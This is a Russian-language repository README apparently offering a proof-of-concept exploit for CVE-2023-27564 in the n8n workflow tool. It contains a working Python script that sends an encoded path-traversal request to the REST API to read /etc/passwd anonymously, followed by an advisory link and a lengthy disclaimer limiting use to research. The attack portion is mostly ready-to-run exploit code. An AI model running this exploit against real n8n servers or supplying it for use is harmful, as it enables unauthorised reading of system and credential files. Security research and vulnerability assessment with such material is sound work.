
Эксплойт PoC для CVE-2023-27564, позволяющий анонимно читать файлы в n8n через path traversal в REST API. Предназначен для исследований безопасности и оценки уязвимостей.
Эта уязвимость позволяет анонимно читать файлы в n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
Доказательство концепции (PoC), представленное в этом репозитории, предназначено только для образовательных целей и исследований в области безопасности. Информация и код предназначены для использования специалистами по кибербезопасности и исследователями для понимания и защиты от уязвимостей в программном обеспечении и системах. Любое использование данного PoC, связанной информации или кода для атак на цели без предварительного взаимного согласия является незаконным и строго запрещено.
Используя данный PoC, вы соглашаетесь с тем, что понимаете потенциальное воздействие уязвимости, которую он демонстрирует, и будете использовать его ответственно и этично. Авторы данного PoC отказываются от любой ответственности за любое неправильное использование этого материала или за любой ущерб, который может возникнуть в результате использования предоставленной информации и кода. Конечный пользователь обязан соблюдать все применимые местные, государственные, национальные и международные законы.
Авторы предприняли все усилия для обеспечения точности и надежности информации, представленной в этом репозитории. Однако информация предоставляется "как есть" без каких-либо гарантий. Авторы не принимают на себя никакой ответственности за точность, содержание, полноту, законность или надежность содержащейся информации.